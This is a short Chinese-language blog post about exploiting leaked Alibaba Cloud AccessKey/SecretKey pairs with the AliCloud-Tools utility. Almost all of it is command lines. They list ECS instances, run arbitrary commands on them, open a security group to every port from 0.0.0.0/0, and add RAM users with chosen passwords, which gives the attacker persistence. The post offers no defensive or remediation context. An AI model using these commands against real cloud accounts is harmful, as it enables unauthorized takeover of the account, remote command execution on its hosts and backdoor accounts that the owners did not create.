云主机AK/SK泄露利用

发布时间 2023-04-27 12:52:59作者: websec80

https://github.com/iiiusky/alicloud-tools

AK/SK利用

行云管家直接大部分主流的云厂商。

https://yun.cloudbility.com/

 

使用方式

该工具主要是方便快速使用阿里云api执行一些操作

Usage:
  AliCloud-Tools [flags]
  AliCloud-Tools [command]

Available Commands:
  ecs         ECS 操作(查询/执行命令),当前命令支持地域ID设置.
  help        Help about any command
  ram         RAM账号增删查操作
  sg          安全组操作,当前命令支持地域ID设置.
  version     

Flags:
  -a, --ak string      阿里云 AccessKey
  -h, --help           help for AliCloud-Tools
      --regions        显示所有地域信息
  -r, --rid string     阿里云 地域ID,在其他支持rid的子命令中,如果设置了地域ID,则只显示指定区域的信息,否则为全部.
      --sak string     阿里云 STS AccessKey
  -s, --sk string      阿里云 SecretKey
      --ssk string     阿里云 STS SecretKey
      --sts            启用STSToken模式
      --token string   阿里云 STS Session Token
  -v, --verbose        显示详细的执行过程


查看所有地域信息

./AliCloud-Tools -a <AccessKey> -s <SecretKey> --regions


查看所有实例信息

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ecs --list


 

 

查看所有正在运行的实例信息

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ecs --list --runner



 

查看指定实例的信息

./AliCloud-Tools -a <AccessKey> -s <SecretKey> [-r <regionId>] ecs --sid <InstanceId>

指定AK/SK 获取主机列表

./AliCloud-Tools -a xxx -s xxx ecs –list


执行命令

./AliCloud-Tools -a <AccessKey> -s <SecretKey> [-r <regionId>] ecs exec -I <InstanceId[,InstanceId,InstanceId,...]> -c "touch /tmp/123123aaaa.txt"

指定AK/SK,实例ID,和执行的命令。

./AliCloud-Tools -a xxx -s xxx ecs exec -I xxx -c “whoami”
 

 

查看安全组策略

./AliCloud-Tools -a <AccessKey> -s <SecretKey> -r <regionId> sg --sid <SecruityGroupId>

 




增加安全组策略

./AliCloud-Tools -a <AccessKey> -s <SecretKey> -r <regionId> --sid <SecruityGroupId> --action add --protocol tcp --port 0/0 --ip 0.0.0.0/0




删除安全组策略

./AliCloud-Tools -a <AccessKey> -s <SecretKey> -r <regionId> --sid <SecruityGroupId> --action del --protocol tcp --port 0/0 --ip 0.0.0.0/0


增加RAM用户

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ram --action add --username test2 --password 1q2w@WW3
 
 

查看RAM用户

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ram --action list

删除RAM用户

./AliCloud-Tools -a <AccessKey> -s <SecretKey> ram --action del --username test2



图形化工具

https://github.com/mrknow001/aliyun-accesskey-Tools/releases/tag/1.0